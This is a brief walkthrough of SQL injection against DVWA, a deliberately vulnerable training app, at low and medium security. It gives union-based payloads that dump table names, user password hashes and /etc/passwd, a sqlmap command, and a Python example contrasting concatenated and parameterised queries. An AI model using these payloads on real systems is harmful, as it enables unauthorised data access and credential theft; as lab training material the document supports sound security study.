HOWTO : DVWA SQL Injection
Security level = low
99 or 1=1
- will display all the records
99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2
- no error message, but displays all records
99 or 1=1 union select null,null
- no error message, but displays all records
99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa
99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'
- will display the users table column list
99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for the users table's first_name and password
99 or 1=1 union select null,@@datadir
- will display the MySQL directory
99 or 1=1 union all select null,load_file('/etc/passwd')
- will display the content of /etc/passwd
Security level = medium
99 or 1=1
- will display all the records
99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2
- no error message, but displays all records
99 or 1=1 union select null,null
- no error message, but displays all records
99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa
99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since the where clause cannot be used, all column names will be listed
or
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is the hex value of "users"
99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for the users table's first_name and password
99 or 1=1 union select null,@@datadir
- will display the MySQL directory
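Why the unquoted payloads above still work when quotes are escaped, and what stops them, shown as an added example (not DVWA's code or the author's). It assumes the medium level escapes quotes but still places the id unquoted in the query, which is consistent with the hex literal used above; sqlite3 stands in for MySQL, and the rows and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows; sqlite3 stands in for DVWA's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "hash-a"), (2, "gordon", "hash-b"), (3, "pablo", "hash-c")],
    )
    return db

def escape_quotes(value):
    # Hypothetical stand-in for quote escaping (assumed medium-level behaviour).
    return value.replace("'", "''")

def lookup_concat(db, user_id):
    # Weak: the escaped value is spliced into a numeric context with no quotes
    # around it, so a payload that contains no quotes passes through unchanged.
    sql = "SELECT first_name, password FROM users WHERE user_id = " + escape_quotes(user_id)
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    # Hardened: accept only a short run of ASCII digits, then bind the value
    # as a parameter so it can never be parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", user_id):
        return []
    return db.execute(
        "SELECT first_name, password FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()

def compare(value):
    # Row counts returned by the weak and the hardened lookup for one input.
    db = make_db()
    return len(lookup_concat(db, value)), len(lookup_bound(db, value))

if __name__ == "__main__":
    for value in ["1", "99 or 1=1", "99 or 1=1 union select 1,2"]:
        print(repr(value), compare(value))
```

The hardened lookup returns the same single row for a legitimate id and nothing for any input that is not purely numeric.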
sqlmap for Security = low
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
The command for Security = medium is similar.
That's all! See you!